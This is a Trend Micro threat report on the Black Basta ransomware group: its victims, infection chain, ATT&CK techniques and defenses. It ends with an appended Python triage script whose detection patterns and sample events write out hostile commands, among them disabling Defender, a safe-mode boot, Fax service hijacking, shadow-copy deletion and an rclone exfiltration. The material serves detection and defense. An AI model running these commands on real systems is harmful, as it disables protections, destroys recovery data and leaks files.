# Ransomware Spotlight: Black Basta

**[trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta)**

By Trend Micro Research

A relative newcomer in 2022, the Black Basta ransomware group has wasted no time making a name for itself, upgrading its toolset and racking up victims around the world only months after its ransomware was first detected. Learn more about this new ransomware and fortify your organization's defenses against this threat.

Black Basta is a ransomware group operating as a [ransomware-as-a-service (RaaS)](https://www.trendmicro.com/vinfo/us/security/definition/ransomware-as-a-service-raas) that was first spotted in April 2022. It has since proven [itself to be a formidable threat, as evidenced by its use of double-extortion tactics](https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti) and the [expansion of its attack arsenal](https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html) to include tools like the [Qakbot trojan](https://www.trendmicro.com/en_us/research/21/k/qakbot-loader-returns-with-new-techniques-and-tools.html) and the [PrintNightmare exploit](https://www.trendmicro.com/en_us/research/21/h/detecting-printnightmare-exploit-attempts-with-trend-micro-vision-one-and-cloud-one.html). Detections of the Black Basta ransomware are currently low, likely because of how recently it was discovered. And like most modern ransomware, Black Basta takes a targeted approach to choosing its victims rather than relying on spray-and-pray tactics.
However, the speed with which its malware authors have augmented their attack arsenal and developed a new Linux build merits further investigation of the emerging ransomware gang behind it.

## What organizations need to know about Black Basta

The Black Basta [ransomware](https://www.trendmicro.com/vinfo/us/security/definition/ransomware) group quickly gained notoriety after it laid claim to massive breaches earlier this year. On April 20, 2022, a user under the name "Black Basta" sought out corporate network access credentials on underground forums in exchange for a share of the profits from their ransomware attacks. Specifically, the user was in the market for credentials that could compromise organizations based in [English-speaking countries, including Australia, Canada, New Zealand, the UK, and the US](https://cyware.com/research-and-analysis/lets-talk-about-black-basta-ransomware-an-in-depth-analysis-7a19). [Two days later, the American Dental Association (ADA) suffered a cyberattack that led it to shutter multiple systems.](https://www.bleepingcomputer.com/news/security/american-dental-association-hit-by-new-black-basta-ransomware/) Data allegedly stolen from the ADA was published on the Black Basta leak site only 96 hours after the attack.

While it was previously assumed that the ransomware group used bought or stolen corporate network access credentials to infiltrate its victims' networks, our analysis of another set of samples monitored within a 72-hour time frame shows a possible correlation between the Qakbot trojan and the Black Basta ransomware. Black Basta continued to evolve, and in June, a Linux build of the ransomware that encrypts VMware ESXi virtual machines was discovered in the wild. Interestingly, the ransomware group does not appear to distribute its malware at random.
That Black Basta's operators have turned to underground markets to acquire network access credentials and have hard-coded a unique ID in every Black Basta build betrays their mature understanding of how ransomware works as a business. While Black Basta may be a newly formed group, the individuals behind it are likely seasoned cybercriminals.

## Top affected countries and industries according to Trend Micro data

In this section, we discuss Trend Micro™ Smart Protection Network™ data on Black Basta's activity from April 1 to July 31, 2022. This data refers to detections of the ransomware's attempts to compromise organizations. Just two countries accounted for over half of the group's 44 ransomware attack attempts during this period: the US at 43%, with Austria a distant second at 15%. As Black Basta has sought to purchase network access credentials for organizations located specifically in the US, among other countries, this may explain the higher number of attacks against US-based businesses.

Figure 1. The countries with the most Black Basta ransomware attack attempts in terms of infected machines from April 1 to July 31, 2022
_Source: Trend Micro™ Smart Protection Network™_

As of this writing, our detections show that Black Basta activity is spread across many different industries. The group has been observed targeting businesses involved in technology, insurance, manufacturing, and utilities. Although Black Basta is a relatively new arrival to the ransomware scene, its detections have been on a steady climb since the ransomware gang surfaced in April, peaking at 22 attack attempts in June before tapering down to 11 the following month.

Figure 2.
The numbers of detections of Black Basta ransomware attack attempts in terms of infected machines in each month from April 1 to July 31, 2022
_Source: Trend Micro Smart Protection Network_

## Targeted regions and industries according to Black Basta's leak site

In this section, we look into the attacks recorded on the Black Basta group's leak site, which represent successfully compromised organizations that, as of this writing, have refused to pay the ransom. Our detections, which pertain to Trend Micro customers, captured only a fraction of the victims found on Black Basta's leak site. Trend Micro's open-source intelligence (OSINT) research and investigation of the site show that from April 1 to July 31, 2022, the group compromised a total of 80 organizations. The bulk of Black Basta's victims were based in North America, which had a victim count of 44, followed by Europe and the Asia-Pacific region. More specifically, the US was at the receiving end of most of the attacks, with 38 affected organizations. Many confirmed ransomware attacks also took place in Germany, with 19 victims.

Figure 3. The distribution by region of Black Basta's victim organizations from April 1 to July 31, 2022
_Sources: Black Basta's leak site and Trend Micro's OSINT research_

Figure 4. The distribution by country of Black Basta's victim organizations from April 1 to July 31, 2022
_Sources: Black Basta's leak site and Trend Micro's OSINT research_

Black Basta's attacks affected a variety of organizations. Construction businesses topped the list with a victim count of 10, while businesses involved in professional services came in second with nine victims. Medium-size organizations made up the lion's share of recorded Black Basta victims.

Figure 5. The distribution by industry of Black Basta's victim organizations from April 1 to July 31, 2022
_Sources: Black Basta's leak site and Trend Micro's OSINT research_

Figure 6.
The distribution by organization size of Black Basta's victim organizations from April 1 to July 31, 2022
_Sources: Black Basta's leak site and Trend Micro's OSINT research_

## Infection chain and techniques

As Black Basta's operations are based on the RaaS model, its infection chain might vary depending on the target. The infection chain illustrated below details the variety of tactics and tools the group uses.

Figure 7. Black Basta's infection chain

**Initial access**

External data reports that a user named "Black Basta" posted on underground forums seeking corporate network access credentials, offering a share of the profit from their attacks as payment. These reports are supported by the fact that a unique ID is hard-coded in each Black Basta build, which could also mean that the ransomware gang does not distribute its malware sporadically. Our internal telemetry shows another set of samples, monitored within a 72-hour time frame, that were using Qakbot. The malware is downloaded and executed from a malicious Excel file and then executes certain PowerShell commands as part of its staging phase.

**Discovery**

Black Basta gathers information about the compromised system or network using:

- PowerShell scripts
- Qakbot's and Cobeacon's built-in information-gathering capabilities
- Third-party tools such as Netcat

**Defense evasion**

- Black Basta uses a batch script containing PowerShell commands to disable antimalware applications.
- It uses Group Policy Objects (GPOs) to disable Windows Defender and Security Center.
- It reboots the victim's computer in safe mode to circumvent antimalware applications that do not start there.
**Privilege escalation**

Black Basta exploits the [PrintNightmare vulnerability (CVE-2021-34527)](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) to perform privileged operations and deliver the Cobalt Strike beacon (aka Cobeacon) or other payloads.

**Credential access**

Black Basta uses Mimikatz to dump credentials.

**Lateral movement**

Black Basta uses different tools and pieces of malware to spread its ransomware to other remote systems in the network:

- BITSAdmin
- PsExec
- Windows Management Instrumentation (WMI)
- RDP
- Qakbot
- Cobeacon

**Exfiltration**

Black Basta uses Cobeacon to exfiltrate the stolen data to an established command-and-control (C&C) server. It also uses Rclone to exfiltrate data from compromised systems.

**Impact**

Black Basta uses the ChaCha20 algorithm to encrypt files. The ChaCha20 encryption key is then encrypted with a public RSA-4096 key that is included in the executable, so the file key can be recovered only by whoever holds the matching private key.

Multiple builds of Black Basta ransomware have been found in the wild:

- One build restarts the victim's system in safe mode, most likely for evasion purposes, before performing encryption. This build also modifies the "Fax" service to enable it to run in safe mode and with service-level access.
- Another build contains only the ransomware's core capabilities, such as wallpaper defacement, file encryption, and deletion of shadow copies.
- A newly found build has a new addition: the -bomb argument, which theoretically allows the ransomware to automatically target all connected machines for encryption.
- The Linux build of the ransomware targets the folder /vmfs/volumes, where virtual machine images are stored, for encryption. To encrypt other folders, the ransomware actors include the -forcepath argument.

Black Basta displays a ransom note as the victim's wallpaper, directing them to a .txt file with more details.
**Other technical details**

Black Basta avoids encrypting files in these folders:

- _$Recycle.Bin_
- _Windows_
- _Local Settings_
- _Application Data_
- _boot_

It avoids encrypting files with these strings in their file names:

- _OUT.txt_
- _NTUSER.DAT_
- _readme.txt_ (the ransom note)
- _dlaksjdoiwq.jpg_ (a desktop wallpaper found in the %TEMP% folder)
- _fkdjsadasd.ico_ (an icon used for encrypted files, found in the %TEMP% folder)

It drops a ransom note as a .txt file in an encrypted folder on the victim's machine.

Figure 9. An example of the contents of the ransom note .txt file

## MITRE ATT&CK tactics and techniques

| Tactic | Technique | Description |
| --- | --- | --- |
| Initial access | T1078 - Valid accounts | Has been reported buying compromised accounts on underground forums to access victim systems. |
| Initial access | T1566.001 - Phishing: Spearphishing attachment | Mirrors the technique used by Qakbot operators to distribute their payload, which delivers the ransomware. |
| Execution | T1059.003 - Command and scripting interpreter: Windows command shell | Uses various scripting interpreters like PowerShell and the Windows command shell. |
| Execution | T1569.002 - System services: Service execution | Stops and deletes the service named "Fax", which it then impersonates for its encryption routine. |
| Execution | T1047 - Windows Management Instrumentation | Has been observed using Windows Management Instrumentation (WMI) to spread and execute files over the network. |
| Privilege escalation | T1068 - Exploitation for privilege escalation | Exploits the PrintNightmare vulnerability (CVE-2021-34527) to perform privileged operations. |
| Defense evasion | T1112 - Modify registry | Modifies registry entries to replace the desktop wallpaper, set the icon associated with encrypted files, establish persistence, and disable defenses. |
| Defense evasion | T1484.001 - Domain policy modification: Group policy modification | Creates a Group Policy Object (GPO) on a compromised domain controller, which pushes registry changes that disable defenses out to domain-joined hosts. |
| Defense evasion | T1562.001 - Impair defenses: Disable or modify tools | Disables Windows Defender and Security Center. |
| Defense evasion | T1562.009 - Impair defenses: Safe mode boot | Disables Windows recovery and repair features and restarts the machine in safe mode. |
| Defense evasion | T1620 - Reflective code loading | Some builds are known to use reflective code loading when executing themselves. |
| Credential access | T1003 - OS credential dumping | Uses Mimikatz to dump credentials. |
| Discovery | T1082 - System information discovery | Uses tools for local system scans. |
| Discovery | T1018 - Remote system discovery | Uses tools for remote network scans. |
| Discovery | T1083 - File and directory discovery | Searches for specific files and directories related to its encryption routine. |
| Lateral movement | T1570 - Lateral tool transfer | Uses tools like PsExec and BITSAdmin to spread the malware laterally across the network. |
| Lateral movement | T1021.001 - Remote services: Remote Desktop Protocol | Uses RDP to spread and execute the malware across the network. |
| Exfiltration | T1041 - Exfiltration over C&C channel | Uses an established command-and-control (C&C) channel to exfiltrate data. |
| Exfiltration | T1567 - Exfiltration over web service | Uses a tool like Rclone to copy stolen data from a client to its cloud server. |
| Impact | T1490 - Inhibit system recovery | Deletes shadow copies. |
| Impact | T1489 - Service stop | Stops and deletes a service named "Fax", which it then impersonates for its encryption routine. |
| Impact | T1486 - Data encrypted for impact | Encrypts files and adds the extension ".basta". |
| Impact | T1491 - Defacement | Replaces the desktop wallpaper to display the ransom note. |

## Summary of tools, exploit, and other malware used

Security teams can keep an eye out for the presence of these tools, exploit, and other malware that are typically used in Black Basta's ransomware attacks:

| Tactic | Tools, exploit, and malware |
| --- | --- |
| Initial access | Spear phishing |
| Execution | PowerShell, Windows command shell, WMI |
| Privilege escalation | PrintNightmare vulnerability (CVE-2021-34527) |
| Credential access | Mimikatz |
| Discovery | Netcat |
| Lateral movement | BITSAdmin, Coroxy, PsExec, RDP, WMI |
| Exfiltration | Cobeacon, Rclone |
| Command and control | Cobeacon, Qakbot (Qbot) |

## Security recommendations

[Security researchers have speculated that Black Basta might be an offshoot of the infamous Conti ransomware gang.](https://www.csoonline.com/article/3669256/black-basta-new-ransomware-threat-aiming-for-the-big-league.html) It has also exhibited similarities to the BlackMatter ransomware gang, including a resemblance between their respective leak sites. Its possible connection to these ransomware groups might explain the high level of in-house expertise behind Black Basta's attacks.

In defending systems against threats like Black Basta, organizations can benefit from establishing security frameworks that allocate resources systematically for building solid defenses against ransomware. Here are some best practices that can be included in these frameworks:

**Audit and inventory**

- Take an inventory of assets and data.
- Identify authorized and unauthorized devices and software.
- Audit event and incident logs.

**Configure and monitor**

- Manage hardware and software configurations.
- Grant admin privileges and access only when necessary to an employee's role.
- Monitor network ports, protocols, and services.
- Activate security configurations on network infrastructure devices such as firewalls and routers.
- Establish a software allowlist that only executes legitimate applications.

**Patch and update**

- Conduct regular vulnerability assessments.
- Perform patching or virtual patching for operating systems and applications.
- Update software and applications to their latest versions.

**Protect and recover**

- Implement data protection, backup, and recovery measures.
- Enable multifactor authentication (MFA).

**Secure and defend**

- Employ sandbox analysis to block malicious emails.
- Deploy the latest versions of security solutions to all layers of the system, including email, endpoint, web, and network.
- Detect early signs of an attack, such as the presence of suspicious tools in the system.
- Use advanced detection technologies such as those powered by AI and machine learning.
- Regularly train and assess employees on security skills.
- Conduct red-team exercises and penetration tests.

A multilayered approach can help organizations guard possible entry points into the system (endpoint, email, web, and network). Security solutions that can detect malicious components and suspicious behavior can also help protect enterprises:

- [Trend Micro Vision One™](https://www.trendmicro.com/en_us/business/products/detection-response.html) provides multilayered protection and behavior detection, which helps block questionable behavior and tools early on, before the ransomware can do irreversible damage to the system.
- [Trend Micro Cloud One™ – Workload Security](https://www.trendmicro.com/en_us/business/products/hybrid-cloud/cloud-one-workload-security.html) protects systems against both known and unknown threats that exploit vulnerabilities. This protection is made possible through techniques such as virtual patching and machine learning.
- [Trend Micro™ Deep Discovery™ Email Inspector](https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/email-inspector.html) employs custom sandboxing and advanced analysis techniques to effectively block malicious emails, including phishing emails that can serve as entry points for ransomware.
- [Trend Micro Apex One™](https://www.trendmicro.com/en_us/business/products/user-protection/sps/endpoint.html) offers next-level automated threat detection and response against advanced concerns such as fileless threats and ransomware, ensuring the protection of endpoints.

## Indicators of compromise (IOCs)

[The indicators of compromise (IOCs) for the threat discussed in this article can be found here.](https://documents.trendmicro.com/assets/txt/IOCs_BlackBasta_Spotlight-1gMstIg.txt) Actual indicators might vary per attack.
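Beyond hash-based IOCs, which vary per attack, the behaviors and artifacts documented above can be checked directly. The following Python script is an added example, not Trend Micro's tooling or anything recovered from a sample: it scores process-creation events against the defense-evasion, exfiltration and impact behaviors in the infection chain (safe-mode reboot, Fax service abuse, Defender disablement via registry or policy, shadow-copy deletion, Rclone uploads, lateral tool transfer), and classifies a post-incident file listing using the exclusion rules from "Other technical details", the ".basta" extension and the ransom-note and %TEMP% artifact names. The event lines and paths are constructed; the command lines are generic Windows commands that produce the effect described, assumed for illustration rather than quoted from Black Basta, and the technique IDs follow the article's ATT&CK table.

```python
"""Host triage for the Black Basta behaviours and artifacts documented in this article.

Added example, not Trend Micro's tooling or actor code. It checks (1) process-creation
events against the defense-evasion, exfiltration and impact behaviours described above
and (2) a file listing against the encryptor's documented exclusion rules, the ".basta"
extension and the ransom-note / %TEMP% artifact names. The sample events and paths are
constructed; the command lines are generic Windows commands that produce the described
effect, not strings quoted from a sample.
"""
import re
from pathlib import PureWindowsPath

# (ATT&CK technique ID as used in the article's table, description, pattern)
PROCESS_RULES = [
    ("T1562.009", "safe-mode boot configured",
     re.compile(r"\bbcdedit(\.exe)?\b.*\bsafeboot\b", re.I)),
    ("T1569.002", "Fax service reconfigured or allowed to run in safe mode",
     re.compile(r"\bsc(\.exe)?\s+(config|create)\s+fax\b|\\SafeBoot\\(Minimal|Network)\\fax\b", re.I)),
    ("T1562.001", "Defender disabled through registry or policy",
     re.compile(r"DisableAntiSpyware|DisableRealtimeMonitoring|Set-MpPreference\b.*-Disable", re.I)),
    ("T1490", "shadow copies deleted",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic\s+shadowcopy\s+delete", re.I)),
    ("T1567", "Rclone upload",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("T1570", "lateral tool transfer",
     re.compile(r"\bbitsadmin(\.exe)?\s+/transfer\b|\bpsexec(64)?(\.exe)?\s", re.I)),
]


def scan_process_events(events):
    """Maps each matched technique ID to the event lines that triggered it."""
    hits = {}
    for line in events:
        for technique, _desc, pattern in PROCESS_RULES:
            if pattern.search(line):
                hits.setdefault(technique, []).append(line)
    return hits


def precursor_alert(hits, threshold=3):
    """Several distinct pre-encryption behaviours on one host justify isolating it immediately."""
    return len(hits) >= threshold


# Exclusion rules from "Other technical details" (compared case-insensitively).
EXCLUDED_DIRS = {"$recycle.bin", "windows", "local settings", "application data", "boot"}
EXCLUDED_NAME_PARTS = ("out.txt", "ntuser.dat", "readme.txt", "dlaksjdoiwq.jpg", "fkdjsadasd.ico")
ARTIFACTS = {"readme.txt": "ransom_note", "dlaksjdoiwq.jpg": "wallpaper", "fkdjsadasd.ico": "icon"}
ENCRYPTED_EXT = ".basta"  # extension reported for the analysed builds; may differ per attack


def classify(path):
    """Returns 'encrypted', 'excluded_dir', 'excluded_name' or 'in_scope_unencrypted'."""
    p = PureWindowsPath(path)
    name = p.name.lower()
    if name.endswith(ENCRYPTED_EXT):
        return "encrypted"
    if any(part.lower() in EXCLUDED_DIRS for part in p.parts[:-1]):
        return "excluded_dir"
    if any(marker in name for marker in EXCLUDED_NAME_PARTS):
        return "excluded_name"
    return "in_scope_unencrypted"  # the encryptor would have targeted this file but did not


def assess_listing(paths):
    """Counts per class plus the dropped artifacts found; 'in_scope_unencrypted' bounds the damage."""
    summary = {"encrypted": 0, "excluded_dir": 0, "excluded_name": 0,
               "in_scope_unencrypted": 0, "artifacts": []}
    for path in paths:
        summary[classify(path)] += 1
        name = PureWindowsPath(path).name.lower()
        summary["artifacts"] += [(kind, path) for marker, kind in ARTIFACTS.items() if marker in name]
    return summary


SAMPLE_EVENTS = [  # constructed "<parent>> <command line>" records
    "svchost.exe> C:\\Windows\\System32\\bcdedit.exe /set {default} safeboot network",
    "cmd.exe> sc config Fax binPath= C:\\Users\\Public\\svc.exe",
    "cmd.exe> reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\Fax /ve /d Service /f",
    'powershell.exe> reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    "cmd.exe> vssadmin.exe delete shadows /all /quiet",
    "cmd.exe> rclone.exe copy D:\\Shares\\HR remote:bucket --transfers 32",
    "explorer.exe> C:\\Windows\\System32\\notepad.exe C:\\Users\\alice\\readme.txt",  # benign
    "cmd.exe> bcdedit /enum",  # benign
]
SAMPLE_LISTING = [  # constructed post-incident file listing
    r"C:\Users\alice\Documents\q3-forecast.xlsx.basta", r"C:\Users\alice\Documents\readme.txt",
    r"C:\Users\alice\Documents\notes.docx", r"C:\Users\alice\AppData\Local\Temp\dlaksjdoiwq.jpg",
    r"C:\Users\alice\AppData\Local\Temp\fkdjsadasd.ico", r"C:\Users\alice\NTUSER.DAT",
    r"C:\Windows\System32\drivers\etc\hosts", r"C:\$Recycle.Bin\S-1-5-21-1\$RXYZ.pdf",
    r"D:\Shares\HR\payroll-2022.csv.basta", r"D:\Shares\HR\OUT.txt",
]

if __name__ == "__main__":
    hits = scan_process_events(SAMPLE_EVENTS)
    print(sorted(hits), "alert" if precursor_alert(hits) else "no alert")
    print(assess_listing(SAMPLE_LISTING))
```

During scoping, `in_scope_unencrypted` is the number to watch: files the encryptor would have targeted but did not touch show where it was stopped or never ran, and the Fax and safe-boot hits are worth alerting on their own because a legitimate host has no reason to emit them together.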